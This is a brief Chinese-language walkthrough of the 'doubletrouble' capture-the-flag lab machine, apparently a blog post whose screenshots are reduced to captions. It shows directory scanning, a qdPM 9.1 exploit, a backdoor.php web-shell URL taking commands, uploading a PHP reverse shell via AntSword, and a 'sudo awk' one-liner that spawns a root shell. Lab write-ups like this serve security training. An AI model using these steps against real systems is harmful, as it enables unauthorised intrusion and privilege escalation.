doubletrouble靶机通关详解

信息收集

doubletrouble靶机通关详解_第1张图片
doubletrouble靶机通关详解_第2张图片

漏洞发现

扫目录
发现secret路径
里面有个图doubletrouble靶机通关详解_第3张图片

doubletrouble靶机通关详解_第4张图片

qdPM9.1 网上找找exp
在这里插入图片描述
doubletrouble靶机通关详解_第5张图片
反弹shell
http://192.168.0.107//uploads/users/632300-backdoor.php?cmd=echo "" > 1.php
蚁剑连上去传php-reverse-shell.php

提权

优化shell
doubletrouble靶机通关详解_第6张图片

发现sudo-l 可以用awk
sudo awk 'BEGIN {system("/bin/sh")}'
在这里插入图片描述

你可能感兴趣的:(内网打靶,安全,网络安全)